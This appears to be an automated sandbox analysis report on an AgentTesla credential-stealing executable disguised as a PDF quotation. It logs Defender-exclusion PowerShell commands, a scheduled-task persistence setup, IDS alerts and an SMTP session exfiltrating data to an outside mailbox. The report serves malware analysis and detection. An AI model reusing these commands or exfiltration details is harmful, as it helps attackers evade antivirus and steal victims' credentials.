                                                      Entropy (8bit):5.143309298274127
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwVxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTwrv
                                                      MD5:2AE384B6BD08DEB19652391B22018E51
                                                      SHA1:F875E428D15D7DEE9B22417379846830BE18CFEE
                                                      SHA-256:841042492DDC076CBAC48A79F1CD463FC9870BB4F24941E12A1203CB16A8E57F
                                                      SHA-512:33D3D623978F18D65A96C4DD940513289DC8056FAD4D7AD2D8CE5BD6D254406D6B6DA155A61AD36C32100906135B1E33F72DDA318B3174A1E2AE971493EC1183
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):625152
                                                      Entropy (8bit):7.805349083482096
                                                      Encrypted:false
                                                      SSDEEP:12288:ovHH2iNDkPRxliW1QqaqYfTY0U0k6QDdWl0KZDHQGET1t1XGOgSCMVNQ:k1pkPRrhwfTY9jBW9AZXWvSCMVNQ
                                                      MD5:0BFB0AB1E8C7EC929E44D70C196B4D21
                                                      SHA1:89C971AE9A832CDFE2E56E8ADFE9972505059C2C
                                                      SHA-256:CAE7DB67AE977F3F41349954ECEDD51D0248924012FBCB33610E44CED5F24611
                                                      SHA-512:F72F7217E75EA998167CBB70DF95926856B7C0DC2BDACB044D5E8DF16381CA05E740D71CDA374567B7AB6DCC9F4427D5B1BF5B96E1C6F737CE44708C3DDABE6C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 20%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b..............0..F...B.......e... ........@.. ....................................@..................................e..K.......t?........................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc...t?.......@...H..............@..@.reloc..............................@..B.................e......H.......|....=......^...<...M............................................0..........+.(..aS(....8.....#..V.-..?}....8.....#..(\..?}....8.....#....@..@}....8.....#X9..v..?}....8.....#.p=...P@}....8.....(.... .....:....&8....8v.......E........8......*...0..........+.(..$_8........E....S...%...8N......Z.. ....(....:....& ....8......#......D@Z.#.......?Z.#......D@YZX..8@.....*8.... ....(....9....&8......9....8......#......D@.......8....8....8......0..$.......+.(.].V...{....Z..8.
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):5773
                                                      Entropy (8bit):5.404171858036157
                                                      Encrypted:false
                                                      SSDEEP:96:BZNhKNdAqDo1ZV1ZMhKNdAqDo1Z8vd3jZMLhKNdAqDo1ZO6nnvZA:j
                                                      MD5:D5B13AAFFF1D8A6E7B1B3A8C47DC4FBD
                                                      SHA1:3E3B7108F50289B81F4CFFA2E7FB8A8A00F99A06
                                                      SHA-256:A686F3F41746F652FD0EAACBC43A64CB90CE0D5835B37FE548885D8C33E463E6
                                                      SHA-512:E8F0C303DE0CFE99A04A9F8066DAEDC37FF442C72F49F866E4690AB8BEA6965EEFAF64CFAF0625F8628A5B0B74E6A923238ED1834552ECB2E07028D2610605FC
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220626092228..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XrgnLg.exe..Process ID: 6712..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220626092228..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XrgnLg.exe..**********************..Windows PowerShell transcript start..Start time: 20220626092650..Username: computer\user..RunAs User: computer\user..Confi
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):3643
                                                      Entropy (8bit):5.382961319466384
                                                      Encrypted:false
                                                      SSDEEP:96:BZXhKNJRbqDo1Z/RCDIZBhKNJRbqDo1Z5qDcD0RD0cD0RD0cD0RD0ZZu:nYyononol
                                                      MD5:3BACB553A7A293802400703686AC82B4
                                                      SHA1:7DBE2D86F2C0B0E7FBEDC6FCB0A374B4EFF987AD
                                                      SHA-256:80B8C4A90450CB5BFCC2C3DEF130735A6C502819494E0BE57E5F327B36DFA0BD
                                                      SHA-512:C37AD4F0C1F02290265B81C57012898FAB732A6537B3845B220DDB59EE2B0349FF7EEDC0CE459871686FEA73D54A0C43910974D749F4282A772F0590F1CB82AB
                                                      Malicious:false
                                                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220626092226..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe..Process ID: 6608..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220626092226..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe..**********************..Command start time: 20220626092534..**********************..PS>TerminatingError(Add-MpPreference):
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.805349083482096
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:UN-Quotation 70000000187366444_PDF.exe
                                                      File size:625152
                                                      MD5:0bfb0ab1e8c7ec929e44d70c196b4d21
                                                      SHA1:89c971ae9a832cdfe2e56e8adfe9972505059c2c
                                                      SHA256:cae7db67ae977f3f41349954ecedd51d0248924012fbcb33610e44ced5f24611
                                                      SHA512:f72f7217e75ea998167cbb70df95926856b7c0dc2bdacb044d5e8df16381ca05e740d71cda374567b7ab6dcc9f4427d5b1bf5b96e1c6f737ce44708c3ddabe6c
                                                      SSDEEP:12288:ovHH2iNDkPRxliW1QqaqYfTY0U0k6QDdWl0KZDHQGET1t1XGOgSCMVNQ:k1pkPRrhwfTY9jBW9AZXWvSCMVNQ
                                                      TLSH:37D4F145F396499DC043127598D9C368222AB387116EC2C679FB321ADD3E3EB53A2F47
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0..F...B.......e... ........@.. ....................................@................................
                                                      Icon Hash:6aca8ae6e0fcc6d2
                                                      Entrypoint:0x4965de
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x62B7DF14 [Sun Jun 26 04:22:44 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                       add byte ptr [eax], al
                                                       (the same instruction repeats for the following 97 lines: the bytes after the entry-point jump are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
                                                       Name | Virtual Address | Virtual Size | Is in Section
                                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x96590 | 0x4b | .text
                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x3f74 | .rsrc
                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9c000 | 0xc | .reloc
                                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                       Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                       .text | 0x2000 | 0x945e4 | 0x94600 | False | 0.8827993365627632 | data | 7.847857536771399 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                       .rsrc | 0x98000 | 0x3f74 | 0x4000 | False | 0.15765380859375 | data | 3.6117029811673764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .reloc | 0x9c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                       Name | RVA | Size | Type | Language | Country
                                                       RT_ICON | 0x98148 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                       RT_ICON | 0x985b0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 16485773, next used block 16420494 | |
                                                       RT_ICON | 0x99658 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                                                       RT_GROUP_ICON | 0x9bc00 | 0x30 | data | |
                                                       RT_VERSION | 0x9bc30 | 0x344 | data | |
                                                       DLL | Import
                                                       mscoree.dll | _CorExeMain
                                                       Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                       06/26/22-09:22:47.581294 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       06/26/22-09:22:47.581243 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       06/26/22-09:22:47.581294 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Jun 26, 2022 09:22:44.188890934 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:44.237401962 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:44.237498045 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.228558064 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.229017019 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.282099962 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.283965111 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.335561991 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.335999012 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.422240019 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.423346043 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.474385977 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.474662066 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.531780958 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.531959057 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.580188990 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.580260992 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.581243038 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.581294060 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.582186937 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.582243919 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
                                                       Jun 26, 2022 09:22:47.632070065 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.633296013 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.636192083 CEST | 587 | 49741 | 193.46.84.142 | 192.168.2.3
                                                       Jun 26, 2022 09:22:47.689951897 CEST | 49741 | 587 | 192.168.2.3 | 193.46.84.142
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Jun 26, 2022 09:22:44.086308002 CEST  49316        53         192.168.2.3    8.8.8.8
Jun 26, 2022 09:22:44.153042078 CEST  53           49316      8.8.8.8        192.168.2.3
Timestamp                             Source IP      Dest IP        Trans ID  OP Code             Name           Type            Class
Jun 26, 2022 09:22:44.086308002 CEST  192.168.2.3    8.8.8.8        0x456b    Standard query (0)  mail.bonsa.lt  A (IP address)  IN (0x0001)
Timestamp                             Source IP      Dest IP        Trans ID  Reply Code    Name           CName  Address        Type            Class
Jun 26, 2022 09:22:44.153042078 CEST  8.8.8.8        192.168.2.3    0x456b    No error (0)  mail.bonsa.lt  -      193.46.84.142  A (IP address)  IN (0x0001)
Timestamp                             Source Port  Dest Port  Source IP      Dest IP        Commands
Jun 26, 2022 09:22:47.228558064 CEST  587          49741      193.46.84.142  192.168.2.3    220 jonas.domenai.lt ESMTP Exim 4.94.2 Sun, 26 Jun 2022 10:22:47 +0300
Jun 26, 2022 09:22:47.229017019 CEST  49741        587        192.168.2.3    193.46.84.142  EHLO 377142
Jun 26, 2022 09:22:47.282099962 CEST  587          49741      193.46.84.142  192.168.2.3    250-jonas.domenai.lt Hello 377142 [102.129.143.61]
                                                                                            250-SIZE 52428800
                                                                                            250-8BITMIME
                                                                                            250-PIPELINING
                                                                                            250-PIPE_CONNECT
                                                                                            250-AUTH PLAIN LOGIN
                                                                                            250-STARTTLS
                                                                                            250 HELP
Jun 26, 2022 09:22:47.283965111 CEST  49741        587        192.168.2.3    193.46.84.142  AUTH login Z2llZHJlQGJvbnNhLmx0
Jun 26, 2022 09:22:47.335561991 CEST  587          49741      193.46.84.142  192.168.2.3    334 UGFzc3dvcmQ6
Jun 26, 2022 09:22:47.422240019 CEST  587          49741      193.46.84.142  192.168.2.3    235 Authentication succeeded
Jun 26, 2022 09:22:47.423346043 CEST  49741        587        192.168.2.3    193.46.84.142  MAIL FROM:<giedre@bonsa.lt>
Jun 26, 2022 09:22:47.474385977 CEST  587          49741      193.46.84.142  192.168.2.3    250 OK
Jun 26, 2022 09:22:47.474662066 CEST  49741        587        192.168.2.3    193.46.84.142  RCPT TO:<markjeffxnt3@gmail.com>
Jun 26, 2022 09:22:47.531780958 CEST  587          49741      193.46.84.142  192.168.2.3    250 Accepted
Jun 26, 2022 09:22:47.531959057 CEST  49741        587        192.168.2.3    193.46.84.142  DATA
Jun 26, 2022 09:22:47.580260992 CEST  587          49741      193.46.84.142  192.168.2.3    354 Enter message, ending with "." on a line by itself
Jun 26, 2022 09:22:47.582243919 CEST  49741        587        192.168.2.3    193.46.84.142  .
Jun 26, 2022 09:22:47.636192083 CEST  587          49741      193.46.84.142  192.168.2.3    250 OK id=1o5MbX-0000zn-Hx


Target ID: 0
Start time: 09:22:06
Start date: 26/06/2022
Path: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
Imagebase: 0x280000
File size: 625152 bytes
MD5 hash: 0BFB0AB1E8C7EC929E44D70C196B4D21
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 4
Start time: 09:22:22
Start date: 26/06/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
Imagebase: 0x1130000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 5
Start time: 09:22:24
Start date: 26/06/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 6
Start time: 09:22:25
Start date: 26/06/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe"
Imagebase: 0x1130000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 7
Start time: 09:22:25
Start date: 26/06/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 8
Start time: 09:22:25
Start date: 26/06/2022
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp"
Imagebase: 0xc0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 9
Start time: 09:22:26
Start date: 26/06/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c9170000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 10
Start time: 09:22:29
Start date: 26/06/2022
Path: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
Imagebase: 0xa60000
File size: 625152 bytes
MD5 hash: 0BFB0AB1E8C7EC929E44D70C196B4D21
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low


Execution Graph

Execution Coverage: 10.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 97
Total number of Limit Nodes: 6

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00B6C0F0
• GetCurrentThread.KERNEL32 ref: 00B6C12D
• GetCurrentProcess.KERNEL32 ref: 00B6C16A
• GetCurrentThreadId.KERNEL32 ref: 00B6C1C3
Memory Dump Source
• Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID: (none)
• API String ID: 2063062207-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00B6C0F0
• GetCurrentThread.KERNEL32 ref: 00B6C12D
• GetCurrentProcess.KERNEL32 ref: 00B6C16A
• GetCurrentThreadId.KERNEL32 ref: 00B6C1C3
Memory Dump Source
• Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID: (none)
• API String ID: 2063062207-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00B69FD6
Memory Dump Source
• Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
Similarity
• API ID: HandleModule
• String ID: (none)
• API String ID: 4139908857-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 00B65489
Memory Dump Source
• Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
Similarity
• API ID: Create
• String ID: (none)
• API String ID: 2289755597-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00B65489
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.297507989.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b60000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 392d6e80360bfbae9fbd4ea90af1dcf668edae76645d5e051b1e2bee0c343a43
                                                        • Instruction ID: 7d427b010dc6d5cb5922503bf97e4e761a691782442d960068818d730771691c
                                                        • Opcode Fuzzy Hash: 392d6e80360bfbae9fbd4ea90af1dcf668edae76645d5e051b1e2bee0c343a43
                                                        • Instruction Fuzzy Hash: EC41E171C0465CCFDB24CFA9C88478DBBB1FF48304F2484A9D419AB255DB756946CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 129 b6c2b2-b6c2b6 130 b6c2b8-b6c34c DuplicateHandle 129->130 131 b6c355-b6c372 130->131 132 b6c34e-b6c354 130->132 132->131
                                                        APIs
